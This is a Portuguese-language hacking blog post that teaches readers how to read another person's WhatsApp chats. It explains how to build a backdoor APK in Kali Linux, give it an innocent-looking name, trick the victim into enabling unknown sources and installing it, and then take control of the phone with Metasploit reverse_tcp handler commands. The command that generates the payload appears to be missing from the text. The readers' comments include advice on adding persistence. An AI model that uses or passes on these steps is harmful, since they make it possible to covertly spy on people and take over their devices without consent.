Hackear Whatsapp - Manha Hacker


Hackers descobrem nova técnica para hackear Whatsapp 


Após muita gente começar a buscar como hackear Whatsapp, resolvi te ensinar duas técnicas para poder ter acesso ás conversas do Whatsapp de uma pessoa.

A Whatsapp, por ser uma empresa muito grande e bem usada, não há nenhuma forma de invadir a plataforma em si, mas existem algumas formas de conseguir acesso total sem hackear a empresa.


#1 Invadindo todo o celular

Para ficar mais fácil, poderíamos invadir todo o celular em si, tendo acesso total ao dispositivo, e junto com isso, teremos acesso ás conversas da vítima.

Uma boa forma de fazer isso é com uma Backdoor

Backdoor, segundo a WikPédia, é um recurso utilizado por diversos malwares para garantir acesso remoto ao sistema ou à rede infectada, explorando falhas críticas não documentadas existentes em programas instalados, softwares desatualizados e do firewall para abrir portas do roteador

Um método muito utilizado pelos hackers para criar essa praga virtual, é pelo Kali Linux, o que vou te ensinar aqui hoje. 

Ainda, existe um método de criar Backdoor pelo Windows de uma forma muito mais fácil e visual. 

E desse jeito, você pode obter até foto/vídeo da câmera frontal e da frente de um modo mais simples.

Para aprender, você pode clicar aqui, a fim de ir ao meu post Como Criar Backdoor No Windows Para Invadir Android e aprender tudo isso.

E no post de hoje, poder ficar tranquilo que vou te ensinar a criar a Backdoor pelo Kali até a instalar no android da vítima, sem nenhuma complicação.

Você pode ir seguindo o passo a passo, invadir o dispositivo da pessoa e ter acesso ás informações.


Abrindo porta para começar o ataque

Para termos o acesso ao Whats, por primeiro, teremos que abrir a porta 4444, por onde será feita toda a invasão.

Nem todo modem há um jeito específico para abrir as portas, dependendo do modelo, marca e provedor tudo isso pode mudar. Então por isso, recomendo que procure um tutorial no YouTube de como abrir portas em tal roteador ou de tal provedor.

PASSO 1

Após ter instalado o Kali, abra o terminal que já vamos começar o ataque. 
Digite o seguinte comando:


Lembrando que aonde está escrito Desktop, é onde será salvo o malware, que você pode mudar para um local de sua preferência. 

E aonde está escrito Backdoor, é nome do arquivo, que você também pode mudar. 
Coloque um nome que não seja Backdoor, senão acho que a vítima iria desconfiar...

PS: TEM QUE TER O ".apk" NO FINAL DO NOME DO ARQUIVO.

Provavelmente, sua praga virtual já esta criada. Agora, temos que passa-la para algum dispositivo.

Vamos fazer isso usando algum serviço de upload de arquivos grátis, que no caso é o Sendspace.

Ao acessar o site da Sendspace, logo no início, terá já um espaço para uparmos um arquivo. Clique nessa opção e escolha sua Backdoor.
Quando terminar de upar, ele nos fornecerá um link, que será o link que vamos passar para a nossa vítima, convencendo ela a baixar em seu celular.

OBS: certifique-se de estavar ativada a opção Fontes Desconhecidas no celular do alvo. Isso pode ser feito no processo de convencer a vítima a baixar, avise ela á fazer isso, clicando em Configurações>Segurança e habilitar a opção Fontes Desconhecidas.

Após a pessoa ter baixado e instalado normalmente o seu vírus, abra um novo terminal e digite msfconsole e pressione ENTER. 
Depois, digite essa sequência (um de cada vez) de comandos:

use exploit/multi/handler

set payload android /meterpreter/reverse_tcp

set lhost (seu ip)

set lport 4444

run

Agora, seu computador (se a vítima iniciou o malware) já estará conectado ao celular da vítima, assim, você acessando pastas e diretórios, conseguirá ter acesso ao Whatsapp.




Avançado

Ok, essa parte é apenas para quem quer realmente se tornar hacker ético, entender mais sobre computação em geral e/ou aprender a programar.

Se você quer ser APENAS um hacker de Facebook com página falsa, esse tópico não é para você. Lamento. Temos outros posts falando disso.

Você quer aumentar seus conhecimentos para se tornar um profissional, certo? Ou pelo menos ter o conhecimento de um, não é?

Aprender a criar vírus, resolver os problemas sem ter que ficar pesquisando tutorial, e burlar todo tipo de sistema e rede?

Então você está no lugar certo! 

Eu sei como é ruim ficar procurando tutoriais atoa, não achar o que precisa, aprender coisas limitadas que vão servir apenas para uma coisa....

Por isso eu resolvi te revelar o segredo para você ter a liberdade e o conhecimento de burlar sites, redes, sistemas, computadores, celulares e sistemas operacionais (até mesmo Linux).

Um hacker nada mais é que alguém que entende tudo sobre como funciona as redes, os servidores, os computadores, sistemas operacionais, sites etc...

Cada um deles é formado por uma linguagem de programação, logo, para você por invadir eles, primeiro terá que entender como é feito, como funciona.

E para isso, terá que aprender algumas linguagens de programação.

Eu separei pra você algumas linguagens que tenho certeza que você irá precisar. 


Sem essas linguagens inúteis que não servem pra nada e você não vai usar. Apenas as úteis que realmente são essenciais para ser um profissional de segurança da informação.

Caso tenha interesse em saber quais são, como aprender da melhor forma e quais são os benefícios, clique aqui para acessar meu post onde explico tudo mais detalhadamente.





3 comentários:

  1. Tá, amigo ja fiz isso e acabou q fui deslogado assim que obtive acesso e coloquei o 2 etapas e meu email. O que fazer? Responder para: zuelbilah2@protonmail.com

    ResponderExcluir
  2. Acontece que o tutorial só funciona de forma interna, ou seja, se a vítima estiver na mesma rede que você. Seria interessante abordar como manusear a tática de forma externa com um servidor próprio e um script de persistência.

    ResponderExcluir
  3. Ninguém instala um .apk que não seja de confiança:/

    ResponderExcluir